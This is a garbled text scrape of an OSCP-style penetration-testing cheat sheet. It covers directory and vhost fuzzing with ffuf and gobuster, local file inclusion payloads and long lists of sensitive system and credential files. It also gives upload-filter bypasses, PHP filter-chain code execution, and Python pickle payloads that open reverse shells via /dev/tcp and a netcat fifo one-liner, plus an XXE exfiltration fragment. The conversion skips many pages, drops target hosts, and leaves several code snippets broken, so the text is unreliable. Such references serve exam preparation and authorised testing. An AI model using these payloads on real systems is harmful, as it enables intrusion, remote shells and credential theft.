Cismcissp Sheetcheet
Cismcissp Sheetcheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 35 of 128 ffuf API Fuzzing Searching for LFI
Fuzzing with PHP Session ID Recursion File Extensions Rate Limiting Virtual Host Discovery ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w
/usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http:/// -H "Host: FUZZ." -fs
185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u
http:///backups/backup_2020070416FUZZ.zip ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac
-t 250 -fc 400,404,412 ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u
"http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ffuf -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u
http:///cd/basic/FUZZ -recursion ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-
list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ffuf -w /usr/share/wordlists/seclists/Discovery/Web-
Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 36 of 128 Massive File Extension Discovery
GitTools ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/
/PATH/TO/FOLDER/ Gobuster Common File Extensions txt,bak,php,html,js,asp,aspx Common Picture
Extensions png,jpg,jpeg,gif,bmp POST Requests ffuf -w
/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u
http:// -fs 1495 ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.
xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip -e // extended mode that renders the full url -k // skip ssl certificate
validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --
wildcard // set wildcard option $ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-
medium.txt -u http:/// $ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x
php $ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 $ gobuster
dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
https://:/ -b 200 -k --wildcard gobuster dir -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u
http:///api/ -e -s 200 OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 37 of 128
DNS Recon VHost Discovery Specifiy User Agent Local File Inclusion (LFI) http:///.php?file= http:///.php?
file=../../../../../../../../etc/passwd http:////php?file=../../../../../../../../../../etc/passwd Until php 5.3
http:////php?file=../../../../../../../../../../etc/passwd%00 Null Byte %00 0x00 Encoded Traversal
Strings ../ ..\ ..\/ %2e%2e%2f gobuster dns -d -w
/usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -
w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -u -t
50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt gobuster vhost -
u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-
domain gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux
OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 38 of 128 %252e%252e%252f
%c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ..././ ...\.\ php://filter Wrapper
https://tinyurl.com/yux6oqdu https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion
https://tinyurl.com/y4ezgl4c/tree/master/File%20Inclusion#wrapper-phpfilter
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php Django, Rails, or Node.js
Web Application Header Values Accept:
../../../../.././../../../../etc/passwd{{ Accept: ../../../../.././../../../../etc/passwd{%0D
Accept: ../../../../.././../../../../etc/passwd{%0A Accept: ../../../../.././../../../../etc/passwd{%00
Accept: ../../../../.././../../../../etc/passwd{%0D{{ Accept:
../../../../.././../../../../etc/passwd{%0A{{ Accept: ../../../../.././../../../../etc/passwd{%00{{ Linux Files
/etc/passwd /etc/shadow /etc/aliases /etc/anacrontab /etc/apache2/apache2.conf
/etc/apache2/httpd.conf /etc/apache2/sites-enabled/000-default.conf /etc/at.allow http:///index.php?
page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd base64 -d .php
OSCP Cheat Sheet 24/10/2023, 08 :22 https://md2pdf.netlify.app/ Page 39 of 128 /etc/at.deny
/etc/bashrc /etc/bootptab /etc/chrootUsers /etc/chttp.conf /etc/cron.allow /etc/cron.deny
/etc/crontab /etc/cups/cupsd.conf /etc/exports /etc/fstab /etc/ftpaccess /etc/ftpchroot /etc/ftphosts
/etc/groups /etc/grub.conf /etc/hosts /etc/hosts.allow /etc/hosts.deny /etc/httpd/access.conf
/etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/access_log
/etc/httpd/logs/access.log /etc/httpd/logs/error_log /etc/httpd/logs/error.log /etc/httpd/php.ini
/etc/httpd/srm.conf /etc/inetd.conf /etc/inittab /etc/issue /etc/knockd.conf /etc/lighttpd.conf
/etc/lilo.conf /etc/logrotate.d/ftp /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/lsb-release
/etc/motd /etc/modules.conf /etc/motd /etc/mtab /etc/my.cnf /etc/my.conf /etc/mysql/my.cnf
/etc/network/interfaces /etc/networks /etc/npasswd OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 40 of 128 /etc/passwd /etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini /etc/php4/apache/php.ini /etc/php4/cgi/php.ini
/etc/php4/apache2/php.ini /etc/php5/apache2/php.ini /etc/php5/apache/php.ini
/etc/php/apache2/php.ini /etc/php/apache/php.ini /etc/php/cgi/php.ini /etc/php.ini
/etc/php/php4/php.ini /etc/php/php.ini /etc/printcap /etc/profile /etc/proftp.conf
/etc/proftpd/proftpd.conf /etc/pure-ftpd.conf /etc/pureftpd.passwd /etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/putreftpd.pdb /etc/redhat-
release /etc/resolv.conf /etc/samba/smb.conf /etc/snmpd.conf /etc/ssh/ssh_config
/etc/ssh/sshd_config /etc/ssh/ssh_host_dsa_key /etc/ssh/ssh_host_dsa_key.pub
/etc/ssh/ssh_host_key /etc/ssh/ssh_host_key.pub /etc/sysconfig/network /etc/syslog.conf
/etc/termcap /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers /logs/pure-
ftpd.log /logs/security_debug_log /logs/security_log /opt/lampp/etc/httpd.conf OSCP Cheat Sheet
24/10/2023, 08 :22 https://md2pdf.netlify.app/ Page 41 of 128 /opt/xampp/etc/php.ini /proc/cmdline
/proc/cpuinfo /proc/filesystems /proc/interrupts /proc/ioports /proc/meminfo /proc/modules
/proc/mounts /proc/net/arp /proc/net/tcp /proc/net/udp /proc//cmdline /proc//maps
/proc/sched_debug /proc/self/cwd/app.py /proc/self/environ /proc/self/net/arp /proc/stat
/proc/swaps /proc/version /root/anaconda-ks.cfg /usr/etc/pure-ftpd.conf /usr/lib/php.ini
/usr/lib/php/php.ini /usr/local/apache/conf/modsec.conf /usr/local/apache/conf/php.ini
/usr/local/apache/log /usr/local/apache/logs /usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log /usr/local/apache/audit_log /usr/local/apache/error_log
/usr/local/apache/error.log /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini /usr/local/etc/pure-ftpd.conf /usr/local/etc/pureftpd.pdb /usr/local/lib/php.ini
/usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 42 of 128 /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini /usr/local/php/httpd.conf
/usr/local/php/httpd.conf.ini /usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdn /usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/httpd_log /usr/local/Zend/etc/php.ini /usr/sbin/pure-config.pl
/var/adm/log/xferlog /var/apache2/config.inc /var/apache/logs/access_log
/var/apache/logs/error_log /var/cpanel/cpanel.config /var/lib/mysql/my.cnf
/var/lib/mysql/mysql/user.MYD /var/local/www/conf/php.ini /var/log/apache2/access_log
/var/log/apache2/access.log /var/log/apache2/error_log /var/log/apache2/error.log
/var/log/apache/access_log /var/log/apache/access.log /var/log/apache/error_log
/var/log/apache/error.log /var/log/apache-ssl/access.log /var/log/apache-ssl/error.log
/var/log/auth.log /var/log/boot /var/htmp /var/log/chttp.log /var/log/cups/error.log
/var/log/daemon.log /var/log/debug /var/log/dmesg /var/log/dpkg.log /var/log/exim_mainlog
/var/log/exim/mainlog /var/log/exim_paniclog /var/log/exim.paniclog /var/log/exim_rejectlog
/var/log/exim/rejectlog /var/log/faillog /var/log/ftplog OSCP Cheat Sheet 24/10/2023, 08 :22
https://md2pdf.netlify.app/ Page 43 of 128 /var/log/ftp-proxy /var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd-access.log /var/log/httpd/access_log /var/log/httpd/access.log
/var/log/httpd/error_log /var/log/httpd/error.log /var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log /var/log/kern.log /var/log/lastlog /var/log/lighttpd/access.log
/var/log/lighttpd/error.log /var/log/lighttpd/lighttpd.access.log /var/log/lighttpd/lighttpd.error.log
/var/log/mail.info /var/log/mail.log /var/log/maillog /var/log/mail.warn /var/log/message
/var/log/messages /var/log/mysqlderror.log /var/log/mysql.log /var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log /var/log/mysql/mysql-slow.log /var/log/proftpd /var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log /var/log/secure /var/log/vsftpd.log /var/log/wtmp /var/log/xferlog
/var/log/yum.log /var/mysql.log /var/run/utmp /var/spool/cron/crontabs/root
/var/webmin/miniserv.log /var/www/html/__init__.py /var/www/html/db_connect.php
/var/www/html/utils.php /var/www/log/access_log /var/www/log/error_log /var/www/logs/access_log
/var/www/logs/error_log /var/www/logs/access.log /var/www/logs/error.log ~/.atfp_history OSCP
Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 44 of 128 ~/.bash_history
~/.bash_logout ~/.bash_profile ~/.bashrc ~/.gtkrc ~/.login ~/.logout ~/.mysql_history ~/.nano_history
~/.php_history ~/.profile ~/.ssh/authorized_keys ~/.ssh/id_dsa ~/.ssh/id_dsa.pub ~/.ssh/id_rsa
~/.ssh/id_rsa.pub ~/.ssh/identity ~/.ssh/identity.pub ~/.viminfo ~/.wm_style ~/.Xdefaults ~/.xinitrc
~/.Xresources ~/.xsession Windows Files C:/Users/Administrator/NTUser.dat C:/Documents and
Settings/Administrator/NTUser.dat C:/apache/logs/access.log C:/apache/logs/error.log
C:/apache/php/php.ini C:/boot.ini C:/inetpub/wwwroot/global.asa C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err C:/MySQL/data/mysql.log C:/MySQL/my.cnf C:/MySQL/my.ini C:/php4/php.ini
C:/php5/php.ini C:/php/php.ini C:/Program Files/Apache Group/Apache2/conf/httpd.conf C:/Program
Files/Apache Group/Apache/conf/httpd.conf C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 45 of 128 C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err C:/Program Files/MySQL/data/mysql-bin.log C:/Program
Files/MySQL/data/mysql.err C:/Program Files/MySQL/data/mysql.log C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log C:/Program Files/MySQL/MySQL Server
5.0/data/mysql.err C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log C:/Program
Files/MySQL/MySQL Server 5.0/my.cnf C:/Program Files/MySQL/MySQL Server 5.0/my.ini C:/Program
Files (x86)/Apache Group/Apache2/conf/httpd.conf C:/Program Files (x86)/Apache
Group/Apache/conf/httpd.conf C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log C:/Program Files (x86)/FileZilla
Server/FileZilla Server.xml C:/Program Files (x86)/xampp/apache/conf/httpd.conf C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM C:/Windows/repair/system C:/Windows/repair/software
C:/Windows/repair/security C:/WINDOWS/System32/drivers/etc/hosts C:/Windows/win.ini
C:/WINNT/php.ini C:/WINNT/win.ini C:/xampp/apache/bin/php.ini C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config OSCP Cheat Sheet 24/10/2023, 08:22
https://md2pdf.netlify.app/ Page 46 of 128 C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log PDF
PHP Inclusion Create a file with a PDF header, which contains PHP code. %PDF-1.4 http:///index.php?
page=uploads/.pdf%00&cmd=whoami PHP Upload Filter
Bypasses .sh .cgi .inc .txt .pht .phtml .phP .Php .php3 .php4 .php5 .php7 .pht .phps .phar .phpt .pgif .pht
ml .phtm .php%00.jpeg .php%20 .php%0d%0a.jpg .php%0a .php.jpg OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 47 of 128 .php%00.gif .php\x00.gif .php%00.png .php\
x00.png .php%00.jpg .php\x00.jpg mv .jpg .php\x00.jpg PHP Filter Chain Generator
https://tinyurl.com/yv3gjun7 PHP Generic Gadget Chains (PHPGGC) phpggc -u --fast-destruct
Guzzle/FW1 /dev/shm/.txt /PATH/TO/FILE/.txt Server-Side Request Forgery (SSRF) https:///item/2?
server=server./file?id=9&x= Server-Side Template Injection (SSTI) Fuzz String
https://tinyurl.com/ypta53z7 python3 php_filter_chain_generator.py --chain '' python3
php_filter_chain_generator.py --chain "" python3 php_filter_chain_generator.py --chain """""" python3
php_filter_chain_generator.py --chain """""""" python3 php_filter_chain_generator.py --chain """"""""
http:///?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKT
sgPz4 python3 php_filter_chain_generator.py --chain '' [+] The following gadget chain will generate the
following code : (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|<--- SNIP --->|
convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0= OSCP Cheat Sheet
24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 48 of 128 ${{ --> OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 125 of 128 command: chmod +s /bin/bash Exploit Skeleton
Python Script #!/usr/bin/python import socket,sys address = '127.0.0.1' port = 9999 buffer = #TBD try:
print '[+] Sending buffer' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address,port)) s.recv(1024) s.send(buffer + '\r\n') except: print '[!] Unable to connect to the
application.' sys.exit(0) finally: s.close() JSON POST Request POST / HTTP/1.1 Host: User-Agent:
Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-
US,en;q=0.5 Content-Type: application/json Content-Length: 95 Connection: close { "auth":{ "name":"",
"password":"" }, "filename":"" } OSCP Cheat Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page
126 of 128 Python Pickle RCE import base64 import pickle import os class RCE: def __reduce__(self):
cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp// <&1'") return = os.system, (cmd, ) if __name__ ==
'__main__': pickle = pickle.dumps(RCE()) print(bas64.b64encode(pickled)) Python Redirect for SSRF
#!/usr/bin/python3 import sys from http.server import HTTPServer, BaseHTTPRequestHandler class
Redirect(BaseHTTPRequestHandler): def do_GET(self): self.send_response(302)
self.send_header('Location', sys.argv[1]) self.end_headers() HTTPServer(("0.0.0.0", 80),
Redirect).serve_forever() import pickle import sys import base64 command = 'rm /tmp/f; mkfifo /tmp/f;
cat /tmp/f | /bin/sh -i 2>&1 | netcat > /tmp/f' class rce(object): def __reduce__(self): import os return
(os.system,(command,)) print(base64.b64encode(pickle.dumps(rce()))) OSCP Cheat Sheet 24/10/2023,
08:22 https://md2pdf.netlify.app/ Page 127 of 128 sudo python3 redirect.py https://tinyurl.com/yjs6w2
#!/usr/bin/env python import SimpleHTTPServer import SocketServer import sys import argparse def
redirect_handler_factory(url): """ returns a request handler class that redirects to supplied `url` """ class
RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() def do_POST(self):
self.send_response(301) self.send_header('Location', url) self.end_headers() return RedirectHandler def
main(): parser = argparse.ArgumentParser(description='HTTP redirect server') parser.add_argument('--
port', '-p', action="store", type=int, default=80, help='port to listen on' parser.add_argument('--ip', '-i',
action="store", default="", help='host interface to listen on' parser.add_argument('redirect_url',
action="store") myargs = parser.parse_args() redirect_url = myargs.redirect_url port = myargs.port host =
myargs.ip redirectHandler = redirect_handler_factory(redirect_url) handler =
SocketServer.TCPServer((host, port), redirectHandler) print("serving at port %s" % port) OSCP Cheat
Sheet 24/10/2023, 08:22 https://md2pdf.netlify.app/ Page 128 of 128 Python Web Request XML External
Entity (XXE) Request SYSTEM "http:///.dtd">%;]> GET / ; Content of .dtd handler.serve_forever() if
__name__ == "__main__": main() import requests import re http_proxy = "https://tinyurl.com/hdorn"
proxyDict = { "http" : http_proxy, } // get a session r = requests.get('http://') // send request r =
requests.post('', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)
%eval; %exfiltrate;